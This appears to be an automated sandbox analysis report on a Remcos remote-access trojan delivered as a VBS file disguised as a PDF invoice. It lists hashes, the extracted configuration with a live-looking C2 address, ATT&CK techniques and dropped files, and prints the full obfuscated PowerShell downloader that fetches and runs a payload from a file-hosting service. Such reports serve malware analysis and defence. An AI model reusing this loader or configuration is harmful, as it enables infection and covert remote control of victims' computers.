remcos | e4ea11f5460a15c91a45fab777cdef0c3245e732a41f2f485e2d7bfdd989f9be

General

Target

A1_racun_09-2024·pdf.vbs
Size

72KB
MD5

75c46eded8d56cffa52b4bf86615c200
SHA1

8519d8a27d4663d6c3c70991c0cc757d16790b4e
SHA256

8e1d67ca2d0e0003ed384472bc64f1c659ea0433539b821203c7e4d42b5efe18
SHA512

3732e3bb921c00dd67d9f630b6638ec05aa097a4e7b4ffdb7344014ee9ba74d8924db42f1d6789577529573bbfca03394cde3e81d4253dd013dcbb2833a07d8d
SSDEEP

1536:sBg98qp1hVcA8ACb+p3HzYxZ+cBvSnAnO70P5XIf:si9fvAAO+lcBanCOZf

Score

10^/10

remcos remotehost discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

a458386d9.duckdns.org:3256

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
delete_file
false
hide_file
true
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-WDQFG0
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Blocklisted process makes network request 9 IoCs

flow	pid	Process
5	2700	powershell.exe
7	2700	powershell.exe
9	2488	msiexec.exe
11	2488	msiexec.exe
13	2488	msiexec.exe
15	2488	msiexec.exe
16	2488	msiexec.exe
18	2488	msiexec.exe
20	2488	msiexec.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2700	powershell.exe
2632	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
5	drive.google.com
9	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2488	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2632	powershell.exe
2488	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2700	powershell.exe
2632	powershell.exe
2632	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2632	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2700	powershell.exe
Token: SeDebugPrivilege	2632	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2488	msiexec.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 3056 wrote to memory of 2700	3056	WScript.exe	30
PID 3056 wrote to memory of 2700	3056	WScript.exe	30
PID 3056 wrote to memory of 2700	3056	WScript.exe	30
PID 2632 wrote to memory of 2488	2632	powershell.exe	35
PID 2632 wrote to memory of 2488	2632	powershell.exe	35
PID 2632 wrote to memory of 2488	2632	powershell.exe	35
PID 2632 wrote to memory of 2488	2632	powershell.exe	35
PID 2632 wrote to memory of 2488	2632	powershell.exe	35
PID 2632 wrote to memory of 2488	2632	powershell.exe	35
PID 2632 wrote to memory of 2488	2632	powershell.exe	35
PID 2632 wrote to memory of 2488	2632	powershell.exe	35

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\A1_racun_09-2024·pdf.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:3056
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Bedstemorens Tweets sautes Reweaving Bldt #>;$Sigten='Precelebrant';<#Opisthographal Uncurious Sumdum Oratorially Nonreligiously Bronkitisserne #>;$Erogen=$host.PrivateData;If ($Erogen) {$Blgedalenes++;}function Udligningsbelbene($Fatuity52){$Skiff42=$Bethank+$Fatuity52.Length-$Blgedalenes;for( $Wienerinder=5;$Wienerinder -lt $Skiff42;$Wienerinder+=6){$gedeskindenes='Slder';$Forsamledes+=$Fatuity52[$Wienerinder];}$Forsamledes;}function Dunne($Pulik){ . ($Knaphulsstings) ($Pulik);}$Salinities=Udligningsbelbene 'FrizzMDisowo DiaczUninviCunenlMi aslCarboaMokke/Param5Germa. Aus,0Mblet Schi,(WaterWBr dbiEng gntilhudHjspnoSuscewTemposUd.ke ClumpNRe deTIntel Brome1Balst0Subre.A oni0Tidsb; ,les NonarWStjeriLecitn Bodr6 Trl 4Flyvr;Doate F senx i co6.mphi4 Soli;.otal AbomarMankivKnst :kl ss1Forul2Pl ds1Sintr.Toers0 pka)N cki Eru tG LommeOpiumcTanglkDebtsoViros/Beska2Geolo0U.dra1Omvi 0Abbre0 ampr1Konto0Hemat1Lan,l RapmbF aneniLukrzrGuanoeSkottf,orveo P.scx Para/Excit1trykn2Brneh1 duis.Plove0 Petr ';$zymotize=Udligningsbelbene 'dic cUErkynsRaideETimbeRBukse- Pis,aUdtaggMiddlEmi liNOribatSubsu ';$Distriktsblade121=Udligningsbelbene 'Foggih En stAccort bahupSemimsExami:Micro/Totur/EjenddNonprr nwomiF derv sbjeeTehue.HandlgSummeo BistoStarcg MrkelLiggeeEpipl. LaurcSemiboNeshnmCoedu/ GroguBiophc data? Udk,eDerivxCastap KrumoSamfur PasttCon,r=Maskid enfaoMe etwExa tnRetr l Rej o Couna ugtidPlanl&HotdoiDimind .ecu=Ropis1GrundWForelnSamd KAttri9B.oloxSlutnw N,wtoProseHVater6KatedBOperoPTogbeVGlauco etallSpidsxHe.erVplagerTen oRTilraKReligVUnterF Hov OBoldk4,arkexTendeI VeroXInstrJImperaWendioShankpAf ra7LengtrVarmh ';$Aquatones=Udligningsbelbene 'Volie>Peziz ';$Knaphulsstings=Udligningsbelbene 'K.llaIFrankEU.chaX.atte ';$Brislers='Raastofmangelens';$Plowed='\Tungebaand.Oly';Dunne (Udligningsbelbene ' N.tr$ PrevgSecu l Cygnostak bSkud abag il Nonv:Fort aUnheusKonfofAkslea DomfltapewtBankkeCano rRegule dri tMeni = xcla$Cloc eAfpron For,v Fris: Pl.raSkridpArt cpKvrked lasuaSneaptSisteaAnted+Pregr$sterePUnacclMisa oOp rkw redieGoo ydafd a ');Dunne (Udligningsbelbene ' tema$DownhgSambhlSigj.oByerhbSignaa,ekselPer o:ZircoOCou aoGive nAddretBibli=Slkni$ S bnDYd rli Kar.s rastMcknirWeakfiMetank Ra et,lodpsfjogtb malalTib raRedssd ideneScen,1,melt2 bibe1Peb.l.f lmosAftrap Cobaltomgaian setPaneg(Ar.ej$SurliASundeq GodsuT,nkbaHonortMadlaoSrbotnLathdeVildesFl.pp)Ba el ');Dunne (Udligningsbelbene '.reye[SludaN Ba eeConsttTerrn.ValutSBurnie .ichrCratcvI,tegiBarylc Ex oeignazP Betho CybeiOmordnOutletIndtgMn viga StvsnH lomaRaastgDeclae MacrrEn ea]kines:Vedtg:A magSNi,roe LtnicMinisuRy eprFals,i YenstSerowyRackaPFatter Prinotr lltRameqoMycetcNonimoNons lFi tl Bd i=Tegng Avit.[ HydrN Ov reKapact Impo. RubeSCe,eveFundhcSubpruBoodlrmerskiPylort antyBylanPReal,rB uehoFlas tBismaoR ligcBiddeo FastlH lefT,tofmySagtmp PaineOv,ra] ogeb:Catal:Hjer TRealilKortssKokke1Landb2Endot ');$Distriktsblade121=$Oont[0];$Obtund=(Udligningsbelbene 'R pag$UneclGNaturlHeptyo,roodbCr ssAComprL redi:HeiniELighelFeminIintermRuddliStemmnOrrhoENonp.RNonseiCountNMakroGDioceEPearlRDolesN AirsETypalSIndla=WhirlnPartoESr.gnw Hell-Imp cOSlagsbpremiJ rintETndehCcomprTNedfo klftnsAltstyWeepis mel,TApokaeDrikfm Mo,n. Ko oNRntgeESlg ntAvert. iplawM ldieIngveBBadmic NytaLKust,IlrdomEShithNFrek.TK gep ');Dunne ($Obtund);Dunne (Udligningsbelbene 'Aff t$PolicE.hinil fhei KrnemS ilii Zionnl,gere.ndrir ggriblu.bnRewhigEn.gme ndtgr FlamnVagtpePolytsEndos.Vi trHAerose Unreaafterdpr,foePr,prrD.scis Afho[Lns i$Bec ezTempeyOpacim lippoVensktTelefiStemmzOms ee.udsf]tandr= Land$MozinSLgemiaSmu llAntediEnantn SpdbiMetabtP esciP inteGru tsBerga ');$Studfishes=Udligningsbelbene 'Halmv$CentrEEst dlBetini IsohmTotaliTi kpnSibyle nthrrBroafiSt esnAfblogD nateMdeplr.husenTabe.e laybsDisma. ErhvDZamb o HouswHaemonIn erl ornioKerataRefordMemenFLa.dli tol lImposeBohrm( Aads$FigurDFrokoiUn,las Ark,t IgbirFejldiUniplk Paast Thias rtifbRefo l MultaS oerd PrineTa pi1Fuld.2Okker1Livsv,Axega$ Syb.MReve iAnekdc SargrUpta oFo eph DoboiEfte,sMen etAblaso.roprlMonegoArro gt ilwyHandi)Knipl ';$Microhistology=$asfalteret;Dunne (Udligningsbelbene 'Still$T tmagBlokilChickoBetydBMoreiaKommaLmikro: IndkBmo,ilrNutilk RaagSA kapt,orseRDi maeSpaltg Arbee SpinNMilja= Deci( GelnTForf EMur.esSki.pTRab,l-S rotPSetouA awaitW tchHtost krigs$ AntiMMimreIE,ihiCPladsRChromo AbonhKohreiStjplSslrepTS ammOCirculSvumnoAnimagGeonoyHuman)Bas i ');while (!$Brkstregen) {Dunne (Udligningsbelbene 'Inter$Restag,ropylIndivoNststbbog,yaSmittlCereb:StatiLImp daUd ykm Sk tpTempoe Fl t=Finan$kastrt Teknr FaluuFolkee iger ') ;Dunne $Studfishes;Dunne (Udligningsbelbene 'Bev tSPh.set AlefaH.rnerGauditSuper-O ersSHyperlSh,pbeElsdyeDrivfpChair S bem4 onex ');Dunne (Udligningsbelbene ' Gyms$Hede.gRsterlJobsko.xittb mallaPrinclYde l: FrdiB TromrStbolkinflas Ophit HavorSdceletegnsgHydr eEkskonPjatt=P,sit(GalsiTUnf ce FishsBajontFlise-KipchPEftera GenatPhotoh Bun Afve,$Leis,MBeveliSheddcAmphirTomfoo nacah Hypoi Tunes Const Inn,o ismol ithio frangtsendy ellb)Brewt ') ;Dunne (Udligningsbelbene 'Forli$SkralgBlomslReiv.o genb tilkaHe.tellongo:PileoRNympheContrt SpiriDadeln,regotS,mareSk.lddTrold=Sci.p$ iewg Jernl ebroRegnfbBogtiaIdentlKapac:Span F KnucaAnkyluBesttnKlynkaLejevt Kbete,cerndOvers1Nonac9Bes.e7Bylde+Quart+ Trea%Disbu$adjunOTurntoE,ochn Dh.bttrans.OplyscUnem oembr,u Folkn aletJenop ') ;$Distriktsblade121=$Oont[$Retinted];}$Faglrereksaminerne=306046;$Jumpers=31093;Dunne (Udligningsbelbene 'Snebl$ScrewgHeptalinhe oBagerb LeodaUpknilRebet:SidelVwi doitredjdKelloe,agttonaesttBjarke gentxSclert nder Telev=Bifil u docGhklineForurtT.gns-gorheCArmhuo,ensinProbltRomanep eben ConvtDrags Mir.$DecedM Shrii RisqcinfirrglycioAfterhBelgniSlar s,nbehtT,edbo Jal lKata,o UndegNdig yTunin ');Dunne (Udligningsbelbene 'Blads$UnglugJailhlPrivao Ico bReproas,mmelOpina: Woo R Chroeknarrn EdelgMasturKittliElatonDesorgSlj,ssBrnesmAmbitiRep,td ,tuddJacuaeCa.sulBols f irkua Her bSakarrRetu i B.kekUrofuaE,holn Bri tP,oceeesphrr Div nS gene To,dsa,kyl Olie =Prfe Hypod[OmbudSKon.ly Elo sGrammtSondeeFejlsmSubge.BademCAnnonoRakisnS ppev Eri eStuntr Eurotbu ge]Ep sy:Huma :Dimi.FstrumrbesvaoB igemPhyllBJernvaChocos.idude Sulk6Pre.e4 goleSKontotFreelrArauci P asnLea agBesig(Jazze$EinegVMazo i sl pdNewtoeSpyt o rikttBarefeFoldnx Ust,t Scan)Kanva ');Dunne (Udligningsbelbene 'Dis r$Kaldeg hiffl StriostivnbAutova.yanslPurit: UjvnsVandbpNytaaeAbrikn F gkcReubee Unorra,idlk.utnaj CepeoSala l,itche EthnrC.mon Seneg= Cy,o Holos[H.steSSynchy Tilts.rosstEnd.ceWoo bmS rut.Tn stT ParaeDisenxDep,otS nco. HjttEConfinS owfcUntiroUninudStithiFuld n ForvgAntnd]Cirr :Tampn:TabueA LaveS TwinCKu stIIndefIUvs,n.BreakGAlleye G netWiattSOvervtMargir MisliTaxomn,kandgSagfr( Toil$Ib,riROxideeTypebnAttingLarinrSawtoiDuedonflatbg EpissRegiomP stei KopidHea adsjle.eGuld,l Bo bfHaandaKontobKomfor nalyiAnmelk HusuaKnsttn Ihrdt,ukeye rierAntifnmelleeInd.os ongh) Test ');Dunne (Udligningsbelbene ' Octo$Pyridg,actel,birroT thob Ord a Panpl Ess,:M rciNtetryoRel anDyre eGoplexSchedpMonola PengnTrlgnsFrosciEloinvAdusteSup rnSprineConars ootsSvejf= Par $Loques An lpdw rfeSalamnPterocSextueDorharSkurkkBrogajUnc,ro lammlRecroe unstr Auxi.NonprsHex.guPas abCh issPro ctHesper LogwiAktivnSti pgAf en( nsha$sulciF Dec.aFjantgBehanlPseudrKnalde A.tsrStoryeMaattk,oldks,nhecaR spem,aleoiMars nR.hineDyslerB olon Siouenonp , Warr$ MothJDam,suTyt emTotalpB smaeProcorSvindsTrane)Ussrm ');Dunne $Nonexpansiveness;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2700

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Bedstemorens Tweets sautes Reweaving Bldt #>;$Sigten='Precelebrant';<#Opisthographal Uncurious Sumdum Oratorially Nonreligiously Bronkitisserne #>;$Erogen=$host.PrivateData;If ($Erogen) {$Blgedalenes++;}function Udligningsbelbene($Fatuity52){$Skiff42=$Bethank+$Fatuity52.Length-$Blgedalenes;for( $Wienerinder=5;$Wienerinder -lt $Skiff42;$Wienerinder+=6){$gedeskindenes='Slder';$Forsamledes+=$Fatuity52[$Wienerinder];}$Forsamledes;}function Dunne($Pulik){ . ($Knaphulsstings) ($Pulik);}$Salinities=Udligningsbelbene 'FrizzMDisowo DiaczUninviCunenlMi aslCarboaMokke/Param5Germa. Aus,0Mblet Schi,(WaterWBr dbiEng gntilhudHjspnoSuscewTemposUd.ke ClumpNRe deTIntel Brome1Balst0Subre.A oni0Tidsb; ,les NonarWStjeriLecitn Bodr6 Trl 4Flyvr;Doate F senx i co6.mphi4 Soli;.otal AbomarMankivKnst :kl ss1Forul2Pl ds1Sintr.Toers0 pka)N cki Eru tG LommeOpiumcTanglkDebtsoViros/Beska2Geolo0U.dra1Omvi 0Abbre0 ampr1Konto0Hemat1Lan,l RapmbF aneniLukrzrGuanoeSkottf,orveo P.scx Para/Excit1trykn2Brneh1 duis.Plove0 Petr ';$zymotize=Udligningsbelbene 'dic cUErkynsRaideETimbeRBukse- Pis,aUdtaggMiddlEmi liNOribatSubsu ';$Distriktsblade121=Udligningsbelbene 'Foggih En stAccort bahupSemimsExami:Micro/Totur/EjenddNonprr nwomiF derv sbjeeTehue.HandlgSummeo BistoStarcg MrkelLiggeeEpipl. LaurcSemiboNeshnmCoedu/ GroguBiophc data? Udk,eDerivxCastap KrumoSamfur PasttCon,r=Maskid enfaoMe etwExa tnRetr l Rej o Couna ugtidPlanl&HotdoiDimind .ecu=Ropis1GrundWForelnSamd KAttri9B.oloxSlutnw N,wtoProseHVater6KatedBOperoPTogbeVGlauco etallSpidsxHe.erVplagerTen oRTilraKReligVUnterF Hov OBoldk4,arkexTendeI VeroXInstrJImperaWendioShankpAf ra7LengtrVarmh ';$Aquatones=Udligningsbelbene 'Volie>Peziz ';$Knaphulsstings=Udligningsbelbene 'K.llaIFrankEU.chaX.atte ';$Brislers='Raastofmangelens';$Plowed='\Tungebaand.Oly';Dunne (Udligningsbelbene ' N.tr$ PrevgSecu l Cygnostak bSkud abag il Nonv:Fort aUnheusKonfofAkslea DomfltapewtBankkeCano rRegule dri tMeni = xcla$Cloc eAfpron For,v Fris: Pl.raSkridpArt cpKvrked lasuaSneaptSisteaAnted+Pregr$sterePUnacclMisa oOp rkw redieGoo ydafd a ');Dunne (Udligningsbelbene ' tema$DownhgSambhlSigj.oByerhbSignaa,ekselPer o:ZircoOCou aoGive nAddretBibli=Slkni$ S bnDYd rli Kar.s rastMcknirWeakfiMetank Ra et,lodpsfjogtb malalTib raRedssd ideneScen,1,melt2 bibe1Peb.l.f lmosAftrap Cobaltomgaian setPaneg(Ar.ej$SurliASundeq GodsuT,nkbaHonortMadlaoSrbotnLathdeVildesFl.pp)Ba el ');Dunne (Udligningsbelbene '.reye[SludaN Ba eeConsttTerrn.ValutSBurnie .ichrCratcvI,tegiBarylc Ex oeignazP Betho CybeiOmordnOutletIndtgMn viga StvsnH lomaRaastgDeclae MacrrEn ea]kines:Vedtg:A magSNi,roe LtnicMinisuRy eprFals,i YenstSerowyRackaPFatter Prinotr lltRameqoMycetcNonimoNons lFi tl Bd i=Tegng Avit.[ HydrN Ov reKapact Impo. RubeSCe,eveFundhcSubpruBoodlrmerskiPylort antyBylanPReal,rB uehoFlas tBismaoR ligcBiddeo FastlH lefT,tofmySagtmp PaineOv,ra] ogeb:Catal:Hjer TRealilKortssKokke1Landb2Endot ');$Distriktsblade121=$Oont[0];$Obtund=(Udligningsbelbene 'R pag$UneclGNaturlHeptyo,roodbCr ssAComprL redi:HeiniELighelFeminIintermRuddliStemmnOrrhoENonp.RNonseiCountNMakroGDioceEPearlRDolesN AirsETypalSIndla=WhirlnPartoESr.gnw Hell-Imp cOSlagsbpremiJ rintETndehCcomprTNedfo klftnsAltstyWeepis mel,TApokaeDrikfm Mo,n. Ko oNRntgeESlg ntAvert. iplawM ldieIngveBBadmic NytaLKust,IlrdomEShithNFrek.TK gep ');Dunne ($Obtund);Dunne (Udligningsbelbene 'Aff t$PolicE.hinil fhei KrnemS ilii Zionnl,gere.ndrir ggriblu.bnRewhigEn.gme ndtgr FlamnVagtpePolytsEndos.Vi trHAerose Unreaafterdpr,foePr,prrD.scis Afho[Lns i$Bec ezTempeyOpacim lippoVensktTelefiStemmzOms ee.udsf]tandr= Land$MozinSLgemiaSmu llAntediEnantn SpdbiMetabtP esciP inteGru tsBerga ');$Studfishes=Udligningsbelbene 'Halmv$CentrEEst dlBetini IsohmTotaliTi kpnSibyle nthrrBroafiSt esnAfblogD nateMdeplr.husenTabe.e laybsDisma. ErhvDZamb o HouswHaemonIn erl ornioKerataRefordMemenFLa.dli tol lImposeBohrm( Aads$FigurDFrokoiUn,las Ark,t IgbirFejldiUniplk Paast Thias rtifbRefo l MultaS oerd PrineTa pi1Fuld.2Okker1Livsv,Axega$ Syb.MReve iAnekdc SargrUpta oFo eph DoboiEfte,sMen etAblaso.roprlMonegoArro gt ilwyHandi)Knipl ';$Microhistology=$asfalteret;Dunne (Udligningsbelbene 'Still$T tmagBlokilChickoBetydBMoreiaKommaLmikro: IndkBmo,ilrNutilk RaagSA kapt,orseRDi maeSpaltg Arbee SpinNMilja= Deci( GelnTForf EMur.esSki.pTRab,l-S rotPSetouA awaitW tchHtost krigs$ AntiMMimreIE,ihiCPladsRChromo AbonhKohreiStjplSslrepTS ammOCirculSvumnoAnimagGeonoyHuman)Bas i ');while (!$Brkstregen) {Dunne (Udligningsbelbene 'Inter$Restag,ropylIndivoNststbbog,yaSmittlCereb:StatiLImp daUd ykm Sk tpTempoe Fl t=Finan$kastrt Teknr FaluuFolkee iger ') ;Dunne $Studfishes;Dunne (Udligningsbelbene 'Bev tSPh.set AlefaH.rnerGauditSuper-O ersSHyperlSh,pbeElsdyeDrivfpChair S bem4 onex ');Dunne (Udligningsbelbene ' Gyms$Hede.gRsterlJobsko.xittb mallaPrinclYde l: FrdiB TromrStbolkinflas Ophit HavorSdceletegnsgHydr eEkskonPjatt=P,sit(GalsiTUnf ce FishsBajontFlise-KipchPEftera GenatPhotoh Bun Afve,$Leis,MBeveliSheddcAmphirTomfoo nacah Hypoi Tunes Const Inn,o ismol ithio frangtsendy ellb)Brewt ') ;Dunne (Udligningsbelbene 'Forli$SkralgBlomslReiv.o genb tilkaHe.tellongo:PileoRNympheContrt SpiriDadeln,regotS,mareSk.lddTrold=Sci.p$ iewg Jernl ebroRegnfbBogtiaIdentlKapac:Span F KnucaAnkyluBesttnKlynkaLejevt Kbete,cerndOvers1Nonac9Bes.e7Bylde+Quart+ Trea%Disbu$adjunOTurntoE,ochn Dh.bttrans.OplyscUnem oembr,u Folkn aletJenop ') ;$Distriktsblade121=$Oont[$Retinted];}$Faglrereksaminerne=306046;$Jumpers=31093;Dunne (Udligningsbelbene 'Snebl$ScrewgHeptalinhe oBagerb LeodaUpknilRebet:SidelVwi doitredjdKelloe,agttonaesttBjarke gentxSclert nder Telev=Bifil u docGhklineForurtT.gns-gorheCArmhuo,ensinProbltRomanep eben ConvtDrags Mir.$DecedM Shrii RisqcinfirrglycioAfterhBelgniSlar s,nbehtT,edbo Jal lKata,o UndegNdig yTunin ');Dunne (Udligningsbelbene 'Blads$UnglugJailhlPrivao Ico bReproas,mmelOpina: Woo R Chroeknarrn EdelgMasturKittliElatonDesorgSlj,ssBrnesmAmbitiRep,td ,tuddJacuaeCa.sulBols f irkua Her bSakarrRetu i B.kekUrofuaE,holn Bri tP,oceeesphrr Div nS gene To,dsa,kyl Olie =Prfe Hypod[OmbudSKon.ly Elo sGrammtSondeeFejlsmSubge.BademCAnnonoRakisnS ppev Eri eStuntr Eurotbu ge]Ep sy:Huma :Dimi.FstrumrbesvaoB igemPhyllBJernvaChocos.idude Sulk6Pre.e4 goleSKontotFreelrArauci P asnLea agBesig(Jazze$EinegVMazo i sl pdNewtoeSpyt o rikttBarefeFoldnx Ust,t Scan)Kanva ');Dunne (Udligningsbelbene 'Dis r$Kaldeg hiffl StriostivnbAutova.yanslPurit: UjvnsVandbpNytaaeAbrikn F gkcReubee Unorra,idlk.utnaj CepeoSala l,itche EthnrC.mon Seneg= Cy,o Holos[H.steSSynchy Tilts.rosstEnd.ceWoo bmS rut.Tn stT ParaeDisenxDep,otS nco. HjttEConfinS owfcUntiroUninudStithiFuld n ForvgAntnd]Cirr :Tampn:TabueA LaveS TwinCKu stIIndefIUvs,n.BreakGAlleye G netWiattSOvervtMargir MisliTaxomn,kandgSagfr( Toil$Ib,riROxideeTypebnAttingLarinrSawtoiDuedonflatbg EpissRegiomP stei KopidHea adsjle.eGuld,l Bo bfHaandaKontobKomfor nalyiAnmelk HusuaKnsttn Ihrdt,ukeye rierAntifnmelleeInd.os ongh) Test ');Dunne (Udligningsbelbene ' Octo$Pyridg,actel,birroT thob Ord a Panpl Ess,:M rciNtetryoRel anDyre eGoplexSchedpMonola PengnTrlgnsFrosciEloinvAdusteSup rnSprineConars ootsSvejf= Par $Loques An lpdw rfeSalamnPterocSextueDorharSkurkkBrogajUnc,ro lammlRecroe unstr Auxi.NonprsHex.guPas abCh issPro ctHesper LogwiAktivnSti pgAf en( nsha$sulciF Dec.aFjantgBehanlPseudrKnalde A.tsrStoryeMaattk,oldks,nhecaR spem,aleoiMars nR.hineDyslerB olon Siouenonp , Warr$ MothJDam,suTyt emTotalpB smaeProcorSvindsTrane)Ussrm ');Dunne $Nonexpansiveness;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2632
- C:\Windows\syswow64\msiexec.exe
  "C:\Windows\syswow64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2488

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
3e74783a868d2e090aa7d21b6aa30222

SHA1
05b5b64cb21906647bea22d385101db127f0e992

SHA256
dbbfd166701b0c822f6f4d9b518e24c2d98ccb8b9ecada8f694a683f6487a287

SHA512
6d9c992a56e37ac6eb69902affa41d49b743e6cfea601a9442b8c940703c8fc0e768cae569b00e8484645f36a2fdb4511a173149eb6a2c4a03d7585dcb7345fc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QHK2XUZ90XS61QB3VREF.temp

Filesize
7KB

MD5
f93df9eb3c997ad299314ba3a9c9e9ee

SHA1
2dc3c7e809f548cae7214a2960cf920eccab0bf4

SHA256
f2d5d7cc0a7592d188e16f234f7349fb941e157f07e9152dc2ec8511ed96c2f6

SHA512
b9956a7f63997d0f0bf521e6278e925ef377317ea9bf20356112f83051038bc8251685c7a6ebe55faacad174a97e4e9ea937bad4fb7f5ee5388f1334e34b5a27

Download Submit
C:\Users\Admin\AppData\Roaming\Tungebaand.Oly

Filesize
438KB

MD5
0743eaf070a6ca9050b3c77dc3ce4e17

SHA1
10bca95e76500e62c55e184ecbfbd9c41b21e4ec

SHA256
79481ee789ec7e7da046d266e6b3628e666aff76bc57213ffcadfbd5900f7503

SHA512
2024f6b23068a9b4e5dffdab6a4acd490da8ede8990fe18d13e0bbfff47918e475489bb5f1c18f54fb5a1d8e998e1625477facbe7cf45e5c28dcd4c4885ce321

Download Submit
memory/2488-42-0x0000000000900000-0x0000000001962000-memory.dmp

Filesize
16.4MB

Download
memory/2488-38-0x0000000000900000-0x0000000001962000-memory.dmp

Filesize
16.4MB

Download
memory/2632-19-0x00000000067A0000-0x000000000B056000-memory.dmp

Filesize
72.7MB

Download
memory/2700-6-0x0000000001E90000-0x0000000001E98000-memory.dmp

Filesize
32KB

Download
memory/2700-12-0x000007FEF58FE000-0x000007FEF58FF000-memory.dmp

Filesize
4KB

Download
memory/2700-13-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

Filesize
9.6MB

Download
memory/2700-15-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

Filesize
9.6MB

Download
memory/2700-11-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

Filesize
9.6MB

Download
memory/2700-9-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

Filesize
9.6MB

Download
memory/2700-4-0x000007FEF58FE000-0x000007FEF58FF000-memory.dmp

Filesize
4KB

Download
memory/2700-7-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

Filesize
9.6MB

Download
memory/2700-8-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

Filesize
9.6MB

Download
memory/2700-5-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing